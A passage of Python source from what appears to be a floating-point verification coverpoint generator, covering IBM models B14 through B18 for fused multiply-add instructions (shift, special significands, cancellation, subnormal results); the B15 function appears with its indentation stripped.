        # NOTE(review): relies on repr(rs1*rs2) containing an 'e' exponent,
        # which holds for the large magnitudes drawn above.
        mul_exp = int(str(rs1*rs2).split('e')[1])
        mul_exp = int(math.log(pow(2,int(mul_exp)),10))
        # Case 1: addend exponent below mul_exp - (2p + 1), when representable.
        if mul_exp-((2*mant_bits)+1) > -1*exp_max:
            rs3_exp = random.randrange(-1*exp_max,mul_exp-((2*mant_bits)+1))
            rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp)
            rs3_num = float.fromhex(rs3_num)
            b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
            comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp) + ' --> Difference smaller than -(2*p + 1)')
        # Case 2: sweep every shift in [-(2p + 1), (p + 1)], clamped to the
        # representable exponent range.
        if mul_exp-((2*mant_bits)+1) < -1*exp_max: exp1 = -1*exp_max
        else: exp1 = mul_exp-((2*mant_bits)+1)
        if mul_exp+mant_bits+1 > exp_max: exp2 = exp_max
        else: exp2 = mul_exp+mant_bits+1
        for j in range(exp1, exp2):
            rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+j)
            rs3_num = float.fromhex(rs3_num)
            b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
            comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+j) + ' --> Values in the range [-(2*p + 1) , (p + 1)]')
        # Case 3: addend exponent above mul_exp + (p + 1).
        rs3_exp = random.randrange(exp2, exp_max)
        rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp)
        rs3_num = float.fromhex(rs3_num)
        b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
        comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp) + ' --> A value larger than (p + 1)')
    # Assemble coverpoint strings: per-operand field constraints, the rounding
    # mode, then a human-readable '#' comment describing the operands.
    coverpoints = []
    k = 0
    for c in b14_comb:
        cvpt = ""
        # Iterate over ops (previously hard-coded to 3) so the loops stay
        # consistent with the 'y != ops' separator test below.
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment[k]
        coverpoints.append(cvpt)
        k += 1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
    (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B14 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b15(flen, opcode, ops, N=-1, seed=-1):
'''
IBM Model B15 Definition:
In this model we test the combination of different shift values between the
addends, with special patterns in the significands of the addends.
For the significand of the addend and for the multiplication result we take the
cases defined in model (B9) "Special Significands on Inputs"
For the shift we take the cases defined in model (B14) "Shift – multiply-add".
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1, 2 = Random
Operand 3 ∈ Abstract Dataset in B9 + Abstract Dataset in B14
Implementation:
- Here the condition is imposed that if the value of the ops variable is 3, then each of the elements in the flip types is iterated and split into their respective sign, mantissa and exponent part.
- A mul variable is initialized and parsed to the field_dec_converter for each rs1 value in the list. Next the loop is run for the mantissa parts generated for rs1 values, where it is checked for certain patterns like the leading 0’s, leading 1’s, trailing 0’s and trailing 1’s.
- The checkerboard list is declared with the probable sequences for rs2. Here the sign and exponent are extracted from the rs1 values. Mantissa part is derived from the checkerboard list. Consecutively, if the flen value differs, then the range available varies.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode “0” for that particular opcode.
'''
opcode = opcode.split('.')[0]
if flen == 32:
flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
e_sz=8
exp_max = 255
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
exp_max = 127
mant_bits = 23
limnum = maxnum
elif flen == 64:
flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
e_sz=11
exp_max = 1023
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
exp_max = 1022
ieee754_limnum = '0x1.fffffffffffffp+507'
mant_bits = 52
limnum = float.fromhex(ieee754_limnum)
if seed == -1:
if opcode in 'fmadd':
random.seed(0)
elif opcode in 'fnmadd':
random.seed(1)
elif opcode in 'fmsub':
random.seed(2)
elif opcode in 'fnmsub':
random.seed(3)
else:
random.seed(seed)
rs1 = []
b15_comb = []
comment = []
if ops == 3:
for i in range(len(flip_types)):
rs1.append(flip_types[i])
for i in range(len(rs1)):
bin_val = bin(int('1'+rs1[i][2:],16))[3:]
rs1_sgn = bin_val[0]
rs1_exp = bin_val[1:e_sz+1]
rs1_man = bin_val[e_sz+1:]
if flen == 32:
if int(rs1_exp,2) < 65: rs2_exp = 0
else : rs2_exp = random.randrange(0,int(rs1_exp,2)-65)
comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference smaller than -(2p + 1)'
rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64:
if int(rs1_exp,2) < 129: rs2_exp = 0
else : rs2_exp = random.randrange(0,int(rs1_exp,2)-129)
comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference smaller than -(2p + 1)'
rs2_exp = '{:011b}'.format(rs2_exp)
mul = fields_dec_converter(flen,rs1[i])
rs1_act = random.uniform(1,limnum)
rs2_act = mul/rs1_act
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
if flen == 32:
if int(rs1_exp,2) > 222: rs2_exp = 255
else : rs2_exp = random.randrange(int(rs1_exp,2)+33, 255)
comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference greater than (p + 1)'
rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64:
if int(rs1_exp,2) > 958: rs2_exp = 1023
else : rs2_exp = random.randrange(int(rs1_exp,2)+65, 1023)
comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference greater than (p + 1)'
rs2_exp = '{:011b}'.format(rs2_exp)
mul = fields_dec_converter(flen,rs1[i])
rs1_act = random.uniform(1,limnum)
rs2_act = mul/rs1_act
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
if flen == 32:
ul = int(rs1_exp,2)+33
ll = int(rs1_exp,2)-65
if int(rs1_exp,2) >= 222: ul = 255
if int(rs1_exp,2) < 65: ll = 0
elif flen == 64:
ul = int(rs1_exp,2)+65
ll = int(rs1_exp,2)-129
if int(rs1_exp,2) >= 958: ul = 1023
if int(rs1_exp,2) < 129: ll = 0
for expval in range (ll, ul):
rs2_exp = expval
if flen == 32:
comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference between -(2p+1) and (p+1)'
rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64:
comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference between -(2p+1) and (p+1)'
rs2_exp = '{:011b}'.format(rs2_exp)
mul = fields_dec_converter(flen,rs1[i])
rs1_act = random.uniform(1,limnum)
rs2_act = mul/rs1_act
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
coverpoints = []
k = 0
for c in b15_comb:
cvpt = ""
for x in range(1, 4):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B15 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b16(flen, opcode, ops, seed=-1):
    '''
    IBM Model B16 Definition:
        This model tests every possible value for cancellation.
        For the difference between the exponent of the intermediate result and the
        maximum between the exponents of the addend and the multiplication result,
        test all values in the range:
        [-(2 * p + 1), 1].

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Intermediate Result.exp - max(addend.exp, multiplication result.exp) in [-(2 * p + 1), 1] --> Condition 1
        Operand 1 {operation 1} Operand 2 {operation 2} Operand 3 = Condition 1

    Implementation:
        - Random values of operands 1 and 2 are obtained from the random library.
        - Since the objective of the test is to cancel the operands among each other, an intermediate result (ir) below the product of operands 1 and 2 is chosen and operand 3 is derived so the fused operation cancels down to ir.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode "0" for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 40
    if flen == 32:
        # Single precision: operands may span the whole normal range.
        maxnum = float.fromhex('0x1.7fffffp+127')
        minsubnorm = float.fromhex('0x0.000001p-126')
        limnum = maxnum
    elif flen == 64:
        # Double precision: cap operands near 2^507 so rs1*rs2 cannot overflow.
        minsubnorm = float.fromhex('0x0.0000000000001p-1022')
        limnum = float.fromhex('0x1.fffffffffffffp+507')
    if seed == -1:
        # Deterministic per-opcode seed keeps generated coverpoints reproducible.
        if opcode in 'fmadd':
            random.seed(0)
        elif opcode in 'fmsub':
            random.seed(1)
        elif opcode in 'fnmadd':
            random.seed(2)
        elif opcode in 'fnmsub':
            random.seed(3)
    else:
        random.seed(seed)
    b16_comb = []
    for i in range(200):
        rs1 = random.uniform(minsubnorm, limnum)
        rs2 = random.uniform(minsubnorm, limnum)
        # ir is the intermediate result the fused operation should cancel to.
        ir = random.uniform(minsubnorm, rs1*rs2)
        # Solve for rs3 per opcode; Decimal avoids double-rounding for flen==64.
        if opcode in 'fmadd':
            if flen == 32:
                rs3 = ir - rs1*rs2
            elif flen == 64:
                rs3 = Decimal(ir) - Decimal(rs1)*Decimal(rs2)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs3 = -1*rs1*rs2 - ir
            elif flen == 64:
                rs3 = -1*Decimal(rs1)*Decimal(rs2) - Decimal(ir)
        elif opcode in 'fmsub':
            if flen == 32:
                rs3 = rs1*rs2 - ir
            elif flen == 64:
                rs3 = Decimal(rs1)*Decimal(rs2) - Decimal(ir)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs3 = ir + rs1*rs2
            elif flen == 64:
                rs3 = Decimal(ir) + Decimal(rs1)*Decimal(rs2)
        if opcode in ['fmadd','fmsub','fnmadd','fnmsub']:
            b16_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    coverpoints = []
    comment = ' | Multiply-Add: Cancellation'
    for c in b16_comb:
        cvpt = ""
        for x in range(1, 4):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment
        coverpoints.append(cvpt)
    mess = 'Generated' + (' '*(5-len(str(len(coverpoints))))) + str(len(coverpoints)) + ' ' + \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B16 for ' + opcode + ' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b17(flen, opcode, ops, seed=-1):
    '''
    IBM Model B17 Definition:
        This model tests all combinations of cancellation values as in model (B16), with
        all possible unbiased exponent values of subnormal results.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Intermediate Result.exp - max(addend.exp, multiplication result.exp) in [-(2 * p + 1), 1] --> Condition 1 (Exponents are subnormal)
        Operand 1 {operation 1} Operand 2 {operation 2} Operand 3 = Condition 1

    Implementation:
        - It functions the same as model B16 but forces the intermediate result into the subnormal range, covering the unbiased exponent values of subnormal results.
        - Operands 1 and 2 are randomly initialized in the range and the subsequent operand 3 value is found.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode "0" for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 40
    if flen == 32:
        # Single precision extremes; limnum bounds the random operand range.
        maxnum = float.fromhex('0x1.7fffffp+127')
        minsubnorm = float.fromhex('0x0.000001p-126')
        maxsubnorm = float.fromhex('0x0.7fffffp-126')
        limnum = maxnum
    elif flen == 64:
        # Double precision: cap operands near 2^507 so rs1*rs2 cannot overflow.
        minsubnorm = float.fromhex('0x0.0000000000001p-1022')
        maxsubnorm = float.fromhex('0x0.fffffffffffffp-1022')
        limnum = float.fromhex('0x1.fffffffffffffp+507')
    if seed == -1:
        # Deterministic per-opcode seed keeps generated coverpoints reproducible.
        if opcode in 'fmadd':
            random.seed(0)
        elif opcode in 'fmsub':
            random.seed(1)
        elif opcode in 'fnmadd':
            random.seed(2)
        elif opcode in 'fnmsub':
            random.seed(3)
    else:
        random.seed(seed)
    b17_comb = []
    for i in range(200):
        rs1 = random.uniform(minsubnorm, limnum)
        rs2 = random.uniform(minsubnorm, limnum)
        # Intermediate result is forced into the subnormal range (but kept
        # below the product so the cancellation setup stays consistent).
        ir = random.uniform(minsubnorm, maxsubnorm)
        if ir > rs1*rs2: ir = random.uniform(minsubnorm, rs1*rs2)
        # Solve for rs3 per opcode; Decimal avoids double-rounding for flen==64.
        if opcode in 'fmadd':
            if flen == 32:
                rs3 = ir - rs1*rs2
            elif flen == 64:
                rs3 = Decimal(ir) - Decimal(rs1)*Decimal(rs2)
        elif opcode in 'fnmadd':
            if flen == 32:
                rs3 = -1*rs1*rs2 - ir
            elif flen == 64:
                rs3 = -1*Decimal(rs1)*Decimal(rs2) - Decimal(ir)
        elif opcode in 'fmsub':
            if flen == 32:
                rs3 = rs1*rs2 - ir
            elif flen == 64:
                rs3 = Decimal(rs1)*Decimal(rs2) - Decimal(ir)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs3 = ir + rs1*rs2
            elif flen == 64:
                rs3 = Decimal(ir) + Decimal(rs1)*Decimal(rs2)
        if opcode in ['fmadd','fmsub','fnmadd','fnmsub']:
            b17_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))
    coverpoints = []
    comment = ' | Multiply-Add: Cancellation ---> Subnormal result '
    for c in b17_comb:
        cvpt = ""
        for x in range(1, 4):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment
        coverpoints.append(cvpt)
    mess = 'Generated' + (' '*(5-len(str(len(coverpoints))))) + str(len(coverpoints)) + ' ' + \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B17 for ' + opcode + ' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def _ibm_b18_operands(flen, opcode, maxnum, ir_dataset, b18_comb):
    """Derive (rs1, rs2, rs3) triplets for each intermediate result and append
    their hex encodings to ``b18_comb``.

    For every entry of ``ir_dataset`` (first element: the intermediate value,
    as a float for flen==32 or a Decimal-parsable string/float for flen==64):
    rs1 is random, rs2 is chosen so rs1*rs2 reproduces the intermediate value,
    and rs3 cancels the product against a fixed reference result so the event
    created in the product is cancelled by the addition. Decimal arithmetic is
    used for flen==64 to keep the setup exact.
    """
    for i in range(len(ir_dataset)):
        rs1 = random.uniform(1, maxnum)
        # Fixed reference result the fused operation should land on.
        res = float.fromhex('0x1.7ffff0p+100')
        if opcode in 'fmadd':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
                rs3 = res - ir_dataset[i][0]
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
        elif opcode in 'fnmadd':
            if flen == 32:
                rs2 = -1*ir_dataset[i][0]/rs1
                rs3 = -1*res + ir_dataset[i][0]
            elif flen == 64:
                # NOTE(review): sign of the ir term differs from the flen==32
                # branch above ('- ir' here vs '+ ir' there) — confirm intended.
                rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = -1*Decimal(res) - Decimal(ir_dataset[i][0])
        elif opcode in 'fmsub':
            if flen == 32:
                rs2 = ir_dataset[i][0]/rs1
                rs3 = ir_dataset[i][0] - res
            elif flen == 64:
                rs2 = Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = Decimal(ir_dataset[i][0]) - Decimal(res)
        elif opcode in 'fnmsub':
            if flen == 32:
                rs2 = -1*ir_dataset[i][0]/rs1
                rs3 = res - ir_dataset[i][0]
            elif flen == 64:
                rs2 = -1*Decimal(ir_dataset[i][0])/Decimal(rs1)
                rs3 = Decimal(res) - Decimal(ir_dataset[i][0])
        if opcode in ['fmadd','fnmadd','fmsub','fnmsub']:
            b18_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3))))

def ibm_b18(flen, opcode, ops, seed=-1):
    '''
    IBM Model B18 Definition:
        This model checks different cases where the multiplication causes some event
        in the product while the addition cancels this event.

        1. Product: Enumerate all options for LSB, Guard and Sticky bit. Intermediate Result: Exact (Guard and Sticky are zero).
        2. Product: Take overflow values from (B4) "Overflow". Intermediate Result: No overflow
        3. Product: Take underflow values from model (B5) "Underflow". Intermediate Result: No underflow

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
